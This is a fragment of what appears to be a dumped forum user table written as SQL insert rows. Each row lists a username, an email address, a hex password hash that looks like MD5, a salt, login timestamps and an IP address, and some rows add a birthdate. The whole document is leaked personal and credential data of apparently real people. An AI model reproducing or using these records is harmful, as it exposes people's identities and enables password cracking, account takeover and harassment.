(268, 2, '', 0, 'flour', 'c33ce2196786a51f1b29f29e298eede1', '2015-11-02', 'sirname2016@ya.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446444577, 0, 1446445144, 1458208915, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.17.6', 0, 1, 0, 0, -1, 0, 0, 'n.-uX(rbI\\LdL(L=6c\'}iL@X3V=99M', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(269, 2, '', 0, 'ninjatos', '18842d395109471587de2774f7c505ca', '2015-11-02', 'hcw75046@foxja.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446449994, 0, 1446449994, 1446450513, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '108.162.229.7', 0, 1, 0, 0, -1, 0, 0, '-?ID&p<4.p3x|`.z?1SD_>!7bp>Z6&', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(270, 2, '', 0, 'rookiel', '71de928403c1640cc99f2b36e7be3205', '2015-11-02', 'rookiel@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446454826, 0, 1463942998, 1468401138, 1449686522, 2947, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092039, '', '0000-00-00', -1, -1, '162.158.103.99', 0, 1, 0, 0, -1, 0, 0, 'YGDP2h1-_K~vHuS*}D-N/zA>CJO7bb', 0, 0, 0, '', 0, 0, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(271, 2, '', 0, 'joker', 'bf40b9f60a747246c78810d52e5f698f', '2015-11-02', 'rusexport@inbox.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446468786, 0, 1446468786, 1446469326, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.81.19', 0, 1, 0, 0, -1, 0, 0, '0U8D\'>{{G*KUc/VJP3J\\-1_1/>lH|I', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(272, 2, '', 0, 'driveomnd', '7ca52561f80bdd17ed075d700f8ac502', '2015-11-03', 'driveomnd@yopmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446521389, 0, 1446521389, 1446523375, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.44', 0, 1, 0, 0, -1, 0, 0, 'Zk>(ejA!~/P=Sx;.bVH5-&N&!|N%i3', 0, 0, 0, '', 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(273, 2, '', 0, 'insin', 'a919dcbfc0d39d4c6f690f51d67f5e08', '2015-11-03', 'insin8@yandex.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446526337, 0, 1446536314, 1446537825, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092039, '', '0000-00-00', -1, -1, '162.158.91.86', 0, 1, 0, 0, -1, 0, 0, 'U=F[Kd!BFk:$MV;\'xJA@ZkVN~XwaVY', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(274, 2, '', 0, 'klanc', '062e828c81b8680f6c6302f4869ec015', '2015-11-03', '17kirill71@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446577896, 0, 1455185874, 1457501944, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.81.17', 0, 1, 0, 0, -1, 0, 0, 'Hb5p+|K\\g*?Wge1b.9Vn-9=h?1Znd$', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(275, 2, '', 0, 'samabada', '6476c2e62acb8c6698500ec5c551972d', '2015-11-03', 'nemesis.redalarm@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446587701, 0, 1446587701, 1446587715, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.105.243', 0, 1, 0, 0, -1, 0, 0, '\\Kcu-zTzm!;pa4AM4^N\\dg]bi785Eo', 0, 0, 0, '', 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(276, 2, '', 0, 'ezek13l', '4a80b3dbfb88517279322667981893a0', '2015-11-11', 'ezek13l@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446634140, 0, 1446635613, 1447240457, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.81.4', 0, 1, 0, 0, -1, 0, 0, ')>|?eH}i5u~WUB_[N$b0|op\\f`/;PC', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(277, 8, '', 0, 'sEACHENGINE902', 'e966539b5696467ccbbb14501836f2ef', '2015-11-04', 'hnyhny2410@HOTMAIL.COM', 0, '', '', '', '', '', '', '', 1, 2, 'Banned', 0, 1446667504, 0, 1446667504, 1446720109, 0, 0, 0, 0, 4, '7', 0, 0, 0, 0, 0, 45091991, '06-26-1982', '1982-06-26', -1, -1, '108.162.222.102', 0, 1, 0, 0, -1, 0, 0, 'uW#DiU.%<7|-7xxs8a#\";qF+wV8xpT', 0, 0, 0, '', 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(278, 2, '', 0, 'pax01', 'b3c0263b8c1fc70b368439265c5d8881', '2015-11-05', 'paxinsec@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446681686, 0, 1467256309, 1473285762, 1460079628, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.210.112', 163, 1, 0, 0, -1, 5, 0, '/PHOOxNk^dG7jgYm56Gc\"VnY*`~7L-', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(279, 2, '', 0, 'cyber_tao_flow', 'f0d2e93f6097cfeedf5d00f5e4dbd1c5', '2015-11-05', 'worm-ws@dataromance.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446685783, 0, 1446686160, 1446686243, 0, 0, 0, 0, 4, '-6', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.55.188', 0, 1, 0, 0, -1, 0, 0, '*=T+3K0XtWG//L$f1e*MaJ3wx9}.r|', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(280, 2, '', 0, 'horp', '7f1250d7cdfc0219dd12a2a327e80c65', '2015-11-05', 'i162043@trbvm.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446700655, 0, 1446700655, 1446700895, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.91.117', 0, 1, 0, 0, -1, 0, 0, 'fM\"zea{*8jmZ6mp9w^`gJHy\\g:', 0, 0, 0, '', 0, 0, 30, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(284, 2, '', 0, 'H0BB1T', '88e0c547bb3347464de031fae6b07c45', '2015-11-10', 'asisasgard@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447161038, 0, 1454516603, 1454594268, 1454514997, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.81.21', 0, 1, 0, 0, -1, 1, 0, '(P);cuV|S\'OBEZ^ZKKO', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(289, 2, '', 0, 'daily', '1f92d6197947cea14ee019c753a2a1c0', '2015-11-11', 'daily@tuta.io', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447251612, 0, 1460399954, 1464359491, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.216.185', 0, 1, 0, 0, -1, 2, 0, 'v4/U~A%zI2s~EZ53C^AKsll.O', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(295, 2, '', 0, 'pyh.ch', '16f1cb4cbc3cd75636c7ce450082d353', '2016-06-04', 'local@pyh.ch', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447531717, 0, 1463941173, 1465049481, 1457163689, 3020, 2, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.80.15', 0, 1, 0, 0, -1, 0, 0, '`TbeMyK|ABb:ZE$:xRUL^vu>?F{#[x', 0, 0, 0, '', 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(296, 2, '', 0, 'MXolotl', 'ea1c6170cb385cfef7cde192e5272d61', '2015-11-16', 'mxoloti@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447675802, 0, 1447675802, 1447676731, 0, 0, 0, 0, 4, '0', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '188.114.103.239', 0, 1, 0, 0, -1, 0, 0, '%a`Y&9JyDm*68ZX*ZV|9Sv=5,;xP[Q', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(297, 2, '', 0, 'azizjon', '11d5bb90ae3394f23520e5113440a6fa', '2015-11-16', 'azizjon@inresearchlab.com', 0, '', 'http://www.inresearchlab.com', '', '', '', '', 'azizjon.m', 1, 1, 'Junior Member', 0, 1447679658, 0, 1447684364, 1447685635, 0, 0, 0, 0, 4, '5', 0, 0, 0, 0, 0, 45091927, '02-20-1987', '1987-02-20', -1, -1, '141.101.80.6', 100, 1, 0, 0, -1, 0, 0, '\"j\'ENZK/YV{+J{\\:dd@c^nK3^|Y[YC', 0, 0, 0, '', 0, 0, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(298, 2, '', 0, 'abdel', '321d3c4d742cad554bdfbdecca0dce6a', '2015-11-16', 'tip36026@clipmail.eu', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447720614, 0, 1458252180, 1458253607, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.230', 0, 1, 0, 0, -1, 0, 0, '=\\r5A-FO)h!P_6HTv)jDB1YDr,l.pB', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(299, 2, '', 0, 'jpsrvcorp', 'e9b7284681c68273bb574501f9cd862b', '2015-11-17', 'jpsrvcorp@privatoria.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447754056, 0, 1447754056, 1447754282, 0, 0, 0, 0, 4, '-8', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '198.41.226.14', 0, 1, 0, 0, -1, 0, 0, 'y5WX8asT>WAjLaC*%p+#B)U!jKq4l<', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(300, 2, '', 0, 'austinbales', '8ca38957119e5a620253a049a36498e7', '2015-11-17', 'austin.bales.gibson@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447755609, 0, 1447755609, 1447755878, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.5', 0, 1, 0, 0, -1, 0, 0, 'x\"W/i9,-\"Td?JmyKhJ1q@xt4^rfLU\"', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(301, 2, '', 0, 'Ayman', 'f160254e4420920e6818091765e6d754', '2015-11-17', 'aimany@protonmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447769220, 0, 1447769220, 1447769463, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.39.223', 0, 1, 0, 0, -1, 0, 0, '0%R-uHGx;W2A:,LxK#3upTP5)w^|5P', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(302, 2, '', 0, 'ccdude', '62055b2a563fa6faa7c07e7d4696155d', '2015-11-17', 'ccdude@nigge.rs', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447817249, 0, 1447817249, 1447817789, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.233', 0, 1, 0, 0, -1, 0, 0, 'J?6NAVq/5Z\\+4hbBNqjxa=AXqHuD?j', 0, 0, 0, '', 0, 0, 61, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(303, 2, '', 0, 'armins', '2db0cbefb9dda42276dfd7369a55a3d1', '2015-11-18', 'anonymous_armynjec@list.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447876539, 0, 1449277980, 1449990997, 0, 0, 0, 0, 4, '1', 0, 0, 0, 0, 0, 45091991, '', '0000-00-00', -1, -1, '162.158.103.101', 0, 1, 0, 0, -1, 0, 0, 'dnOcsabQ6OjeAQGRhw*PI]R0\'dq5*$', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(304, 2, '', 0, 'Kosmas', 'd12623f8dbd1b5d7b2e4fff8dcdb3c63', '2015-11-18', 'crzyfingers@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1447908418, 0, 1456772738, 1458023263, 1456772712, 3016, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.219.66', 0, 1, 0, 0, -1, 4, 0, 'nmD+~>D?e-U($lba#YXnSp0`?.{o6C\'%c$/6iM$,oAN5LMh^27W', 0, 0, 0, '', 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(315, 2, '', 0, 'R3d', '4a54fe1ce84db242bcc7640daaa39bab', '2015-11-27', 'redteam@tuta.io', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448648511, 0, 1448648511, 1448648853, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.229.19', 0, 1, 0, 0, -1, 0, 0, 'k%@sSvf3tJ/R6hTMdxy_aB~uvel+;/', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(316, 2, '', 0, 'KristineZd', '05aebdddb38b14f0b9d5cfaea6668e53', '2015-11-27', 'difigiti@ciekawy.poczta.lolekemail.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448679451, 0, 1448679451, 1448679451, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.50.180', 0, 1, 0, 0, -1, 0, 0, 'qKZB.H=\"jXaH=0vK)\"~7-jr6{bC^NV', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(317, 2, '', 0, 'j0hn', '03682ee0c5d2ab6f1d56a398bdbdae23', '2015-11-28', 'j0hn@byom.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448733326, 0, 1448733326, 1448733349, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.93.63', 0, 1, 0, 0, -1, 0, 0, 'd?YM?*zmYyi+4M+_Fwvnrw(oB9=+]x', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(318, 2, '', 0, 'asfsaf', 'f1657a57c4a9540e58b90fd59c504d27', '2015-11-28', 'j0hn1223@byom.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448735094, 0, 1448735433, 1448735433, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.93.63', 0, 1, 0, 0, -1, 0, 0, '=YgpUu#v^7Tw!9|^hccNL~l0,9_ic<', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(319, 2, '', 0, 'Blast3r', '05a39c47eb4177c36848c3fc7a05cc2f', '2015-11-30', 'blastert3@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448874731, 0, 1448877503, 1448878790, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '108.162.229.14', 0, 1, 0, 0, -1, 0, 0, 'Qq>!\"KO]&i}\'n41w~NCHy(mbfR#Y2T', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(320, 2, '', 0, 'johndoe', '878bcbee7ef9886926a2fb2d8be84655', '2015-12-01', 'triclinosa@thrma.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448989423, 0, 1448989423, 1448990172, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.99.251', 0, 1, 0, 0, -1, 0, 0, 'Rt72M|5VQLHXP.\'=$9V:G@rH4z.?Q-', 0, 0, 0, '', 0, 0, 59, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(321, 2, '', 0, 'shellgoodman', '40b4bcc6f22c546492349d86aa8becc9', '2015-12-01', 'shellgoodman@ukr.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1448993445, 0, 1452433459, 1454720579, 1454720576, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.96.22', 0, 1, 0, 0, -1, 0, 0, 'tc\"~C=o90LCH9IQ^r@VznaWdHVt6kW-|9j9v6)?p~;zDG0@\"__', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(326, 2, '', 0, 'JQNUlrike', 'b890b67fd012a138d1b4fa85636a995a', '2015-12-05', 'troystruppkpq@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449344242, 0, 1449344242, 1449344242, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.215.46', 0, 1, 0, 0, -1, 0, 0, 'H\\EoKX4ve*?y$@A8Gt.-dz[qG5A!2L', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(327, 2, '', 0, 'DollyTejed', 'ec59d799c901517cd5b7a68192818fe4', '2015-12-06', 'michalkova@list.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449414650, 0, 1449414650, 1449414650, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.215.200', 0, 1, 0, 0, -1, 0, 0, ':Q!K!ct-?N/5\"2pd27gHkp{,7+$#OI', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(328, 2, '', 0, 'forbz', 'b1d3f1427c77858c3ef25672e7381295', '2015-12-06', 'softax@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449448794, 0, 1449448794, 1449448839, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.89.9', 0, 1, 0, 0, -1, 0, 0, 'mOq|A\\{\"TIpLz6cxgFu!Du!gG\'D\\UW', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(329, 2, '', 0, 'ScappaFlow', 'f7cdee7e5320f3219f72f12019adfdcf', '2015-12-08', 'dragonfly.oneg@protonmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449562609, 0, 1449562609, 1449562609, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.15', 0, 1, 0, 0, -1, 0, 0, '`]-8Zyl\\)k0[aO5*', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(335, 2, '', 0, 'AngelaBeat', 'a73a2d557b3df9a595f8160556143953', '2015-12-11', 'civighi@ciekawy.poczta.lolekemail.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449818657, 0, 1449818657, 1449818657, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.55.190', 0, 1, 0, 0, -1, 0, 0, '-B!e9fmr}lmx%zT|h\'Foukmp0RVZ+E', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(336, 2, '', 0, '@BluBailey', '8fed415e1349f5e72e4c100f30e315d7', '2015-12-11', 'praisevisionmedia@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449847362, 0, 1449847362, 1449847627, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.56.190', 0, 1, 0, 0, -1, 0, 0, 'Bc^eYI65_5HEZ,nH!^rVd*$:\"uGheB', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(337, 2, '', 0, 'terrax', 'e4d64682005d17bee329df07b1f7f7ce', '2015-12-11', 'terrax@byom.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1449875318, 0, 1449875318, 1449875474, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.89.2', 0, 1, 0, 0, -1, 0, 0, 'f\"O0LYEBM?Fiyh7^58#3aEJ~c_\\zNq', 0, 0, 0, '', 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(338, 2, '', 0, 'wellknown', '00706c7ab2b9b22d9bdb6a03814f5eba', '2015-12-16', 'wellknown@tuta.io', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450270979, 0, 1450270979, 1450271034, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '162.158.88.16', 0, 1, 0, 0, -1, 0, 0, 'MhS_8Y%\'\\z/67CSwT8oU/g`DUEDJ6T', 0, 0, 0, '', 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(339, 2, '', 0, 'al3x85', 'ed11ace7de2603e7ebe05b1aa51f12be', '2015-12-17', 'al3x85@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450410832, 0, 1457166743, 1459400319, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.103.92', 0, 1, 0, 0, -1, 0, 0, '803KIZ(O{;s(BgU>ER9m70@r_b*`GT', 0, 0, 0, '', 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(340, 2, '', 0, 'hack spear', '13d853982b69eacc227333a72d467156', '2015-12-19', 'mathewtracker26@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450531501, 0, 1450531501, 1450532003, 1450531599, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.241', 0, 1, 0, 0, -1, 0, 0, 'D]Ryrw\\Yzm]kZQF\"I`LtY;w.Nu:aa^', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(341, 2, '', 0, 'slashzor', '6279bf2d31c7d3fd7eb276045922a8c2', '2015-12-20', 'slash7296@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450608537, 0, 1456362256, 1458669553, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.98.245', 0, 1, 0, 0, -1, 0, 0, '*thc/u8T$LL>}]B4$\\<\"et+6vK%U-K', 0, 0, 0, '', 0, 0, 61, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(342, 2, '', 0, 'ZaDoR', 'c8138e8693e77c0e270798e98c089b87', '2015-12-21', 'danniel.dock@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450711320, 0, 1450711320, 1450711491, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.17.54', 0, 1, 0, 0, -1, 0, 0, 'fX;lMwpupT]&zZ6+5ln]i1I8g@CO.1', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(343, 2, '', 0, 'king_alex', 'f3182654db7e7974de59154700762cf1', '2015-12-22', 'kingalex@protonmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450796307, 0, 1464582538, 1465579742, 1450995211, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.15', 0, 1, 0, 0, -1, 1, 0, '/fhcBE$\'YpN;#^;A@K#foS{Du\\-M4[', 0, 0, 0, '', 0, 0, 89, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(344, 2, '', 0, 'balt', '804d43b6f580b299dc8e3cb37c01886c', '2015-12-22', 'ya.veys2015@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450821158, 0, 1454900632, 1454900632, 1450821201, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.99', 0, 1, 0, 0, -1, 0, 0, '97Kw~7/8QX^FG\'Qr#!9ls0\"ux\\4Jy(', 0, 0, 0, '', 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(345, 2, '', 0, 'BobCpm1517', 'e85703df3a04b692dcaea2df489a15b3', '2015-12-23', 'jannnunes@nonspammer.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1450905163, 0, 1450905163, 1450905163, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.91', 0, 1, 0, 0, -1, 0, 0, 'Gt|Z$3.;3;]y[gN2`Nx;Res&\\X.8YBGmMQUj:m`ryS', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(354, 2, '', 0, 'knvomlk', '6fef9861e9dcb33516ecc5da19a0351b', '2015-12-26', 'knvomlk@ghostmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451112836, 0, 1452457242, 1458680612, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.5', 0, 1, 0, 0, -1, 0, 0, '4!vq\"MDjI#90aT{3P:\'dC&m,@KEhZCkJfEjHn', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(356, 2, '', 0, 'a1da', '717f29d319179376539491b327aef65d', '2015-12-26', 'zaq1ZAQ!@mailinator.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451160173, 0, 1455027293, 1456066894, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '162.158.89.14', 0, 1, 0, 0, -1, 0, 0, '5S58zS^IFn(g_4A]SM2Nj4!j.\"~SC^', 0, 0, 0, '', 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(357, 2, '', 0, 'NPDGrazyna', '09e4b7cd8afd9203f5cfbc4899b3794d', '2015-12-27', 'dannyknisley7156@nonspam.eu', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451220518, 0, 1451220518, 1451220518, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.86', 0, 1, 0, 0, -1, 0, 0, '$s~ui}-(\'b6MF_9>u%0tAyV0m.ko%R', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(358, 2, '', 0, 'totegipt', '6aea8737acd2821b3343dff8bd87d617', '2015-12-27', 'tenhri999@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451258052, 0, 1451258314, 1451258314, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '199.27.128.245', 0, 1, 0, 0, -1, 0, 0, '21}xkFXr]-WG-@L|c&M}!Q\'ibh?yv|', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
